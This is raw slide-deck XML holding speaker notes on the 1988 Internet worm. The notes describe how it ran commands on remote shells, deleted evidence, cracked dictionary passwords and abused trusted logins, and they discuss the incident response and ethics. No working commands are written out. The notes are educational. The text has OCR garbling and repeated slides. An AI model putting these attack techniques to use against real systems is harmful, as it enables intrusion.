              <a:t> to</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have been Usenet news groups and a mailing list I put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together when the worm was first discovered. Although</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useful, these methods did not ensure timely, widespread dissemination of useful information-especially</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since they depended on the Internet to work!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24512496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30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19614114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kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>he server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>wor:n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> sent the following command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stream to the connected shell:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>PATH…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Then, for each binary file it had transferred (just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two in this case although the code is written to</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allow more), it would send the following form of</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command sequence:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>cc….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>h.e</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rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> would succeed only if the linked version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of the worm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>fai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>’.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> to start execution. If the server</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determined </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>tha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>: the host was now infected, it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closed the connection. Otherwise, it would try the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other binary file. After both binary files had been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tried, it would send over </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> commands for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>objec:t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> files to clear away all evidence of the attempt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at infection.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>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31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4374034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kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>he server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>wor:n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> sent the following command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stream to the connected shell:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>PATH…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Then, for each binary file it had transferred (just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two in this case although the code is written to</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allow more), it would send the following form of</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command sequence:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>cc….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>h.e</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rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> would succeed only if the linked version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of the worm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>fai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>’.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> to start execution. If the server</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determined </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>tha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>: the host was now infected, it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closed the connection. Otherwise, it would try the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other binary file. After both binary files had been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tried, it would send over </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> commands for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>objec:t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> files to clear away all evidence of the attempt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at infection.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CHMK – Change mode to Kernel</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="72888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kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Further,</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such an attitude </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>wculcl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> be contrary to the whole purpose of having an open, research-oriented network. The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worm was caused by a breakdown of ethics as well as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lapses in security-a purely technological attempt at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prevention will not address the full problem, and may</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just cause new difficulties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The response to this incident was largely ad hoc, and resulted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in both duplication of effort and a failure to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>d.isseminate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valuable information to sites that needed it. Many site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administrators discovered the problem from reading</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newspapers or watching television. The major sources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of information for many of the sites affected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>s;eems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> to</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have been Usenet news groups and a mailing list I put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together when the worm was first discovered. Although</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useful, these methods did not ensure timely, widespread dissemination of useful information-especially</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since they depended on the Internet to work!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25553567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kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Further,</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such an attitude </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>wculcl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> be contrary to the whole purpose of having an open, research-oriented network. The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worm was caused by a breakdown of ethics as well as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lapses in security-a purely technological attempt at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prevention will not address the full problem, and may</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just cause new difficulties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The response to this incident was largely ad hoc, and resulted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in both duplication of effort and a failure to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>d.isseminate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valuable information to sites that needed it. Many site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administrators discovered the problem from reading</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newspapers or watching television. The major sources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of information for many of the sites affected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>s;eems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> to</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have been Usenet news groups and a mailing list I put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together when the worm was first discovered. Although</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useful, these methods did not ensure timely, widespread dissemination of useful information-especially</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since they depended on the Internet to work!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>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34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="541395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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2107767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kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The password is encrypted using a permuted version of the Data Encryption Standard (DES) algorithm, and the result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is compared against a previously encrypted version present in a word-readable accounting file. If a match</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occurs, access is allowed. No plaintext passwords are contained in the file, and the algorithm is supposedly</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noninvertible without knowledge of the password. The organization of -the passwords in UNIX allows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nonprivileged commands to make use of information stored in the accounts file, including authentication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schemes using user passwords. However, it also allows an attacker to encrypt lists of possible passwords and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then compare them against the actual passwords without calling any system function. In effect, the security</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of the passwords is provided by the prohibitive effort of trying this approach with all combinations of letters.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Unfortunately, as machines get faster, the cost of such attempts decreases. Dividing the task among multiple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processors further reduces the time needed to decrypt a password. Such at tacks are also made easier when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users choose obvious or common words for their passwords. An attacker need only try lists of common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words -until a match is found. The worm used such. an attack to break passwords. It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used lists of words, including the standard online dictionary, as potential passwords. It encrypted them using</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 fast version of the password algorithm and then compared the result against the contents of the system file.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The worm exploited the accessibility of the file coupled with the tendency of users to choose common words as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their passwords. Some sites reported that over 50 percent of their passwords were quickly broken by this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simple approach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>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9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2929324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kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>A related flaw exploited by the worm involved the use of trusted logins. One of the most useful features of</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BSD UNIX-based networking code is the ability to execute tasks on remote machines. To avoid having to repeatedly type passwords to access remote accounts, it is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possible for a user to specify a list of host/login name pairs that are assumed to be “trusted,” in the sense that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 remote access from that host/login pair is never asked for a password. This feature has often been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responsible for users gaining unauthorized access to machines (cf. [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>]), but it continues to be used because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of its great convenience. The worm exploited the mechanism by locating machines that might “trust” the current machine/login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being used by the worm. This was done by examining files that listed remote machine/logins used by the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host3 Often, machines and accounts are reconfigured for reciprocal trust.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>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10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1514260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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3186662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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3184666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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3115750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C184DDA-6CDF-44C8-BB9C-A153D69ADA64}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2483148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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Foliennummernplatzhalter 5"/>
          <p:cNvSpPr>
